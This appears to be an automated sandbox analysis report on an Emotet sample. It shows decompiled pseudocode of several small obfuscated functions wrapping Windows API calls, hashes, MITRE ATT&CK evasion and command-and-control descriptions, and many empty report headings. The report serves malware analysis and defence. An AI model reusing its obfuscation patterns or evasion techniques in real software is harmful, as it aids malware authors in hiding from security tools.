Uniqueness Score: -1.00%

Function 10017708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100177B6

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: e01db37ee4e11aec0ed8fe9f4a455c9f05bd25de310d07c039ce80a3f7d39afa
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: CC1134B6D00209FBDB08CFA4D94A9AEBBB4FF44304F108189E814AB251E3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 1001A566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1001A566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E10022523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E10002309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 1001A601

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 916d80f1436c55e495bde87e87ea32654bf5eec04e964754689aa7ec780072d2
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1F11F3B5C1030DFBCB18DFE8D8869AEBBB4EF44304F108698A855A6261D3B56B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000008.00000002.879826400.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.879795728.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.879874908.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report qrb6jVwzoe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 6F30116B, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99
libraryloaderprocessCOMMON

Function 6F301035, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128
COMMON

Function 6F3011A4, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
libraryloaderprocessCOMMON

Function 6F301167, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67
libraryloaderprocessCOMMON

Function 6F301000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8
synchronizationCOMMON

Function 6F32288D, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Function 6F3201B7, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Function 6F31FEB1, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Function 6F31C650, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 6F31BB30, Relevance: 14.0, APIs: 9, Instructions: 493
memoryCOMMONCrypto

Function 6F31FF39, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Function 6F31F416, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 6F319F20, Relevance: 2.7, Strings: 2, Instructions: 163
COMMONCrypto

Function 6F326564, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Function 6F32188A, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 6F31B2B0, Relevance: .4, Instructions: 403
COMMONCrypto

Function 6F31B080, Relevance: .1, Instructions: 145
COMMONCrypto

Function 6F3214AE, Relevance: .0, Instructions: 23
COMMON